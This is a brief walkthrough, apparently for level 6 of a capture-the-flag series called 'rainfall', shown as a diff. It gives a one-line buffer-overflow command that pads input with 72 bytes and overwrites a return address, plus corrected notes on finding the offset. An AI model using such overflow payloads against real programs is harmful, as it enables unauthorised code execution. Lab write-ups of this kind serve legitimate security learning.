vladdez/rainfall/level6/walkthrough.md

 ./level6 $(python -c 'print "b" * 72 + "\x54\x84\x04\x08"')

 QA:
-- how did we know the correct offset?
+- how do we know the correct offset?
-- overflow by any number -> get address adn pit it in 'find offset' (pattern and offset are related)
+- overflow by any number -> get address and put it in 'find offset' (pattern and offset are related)

 Functions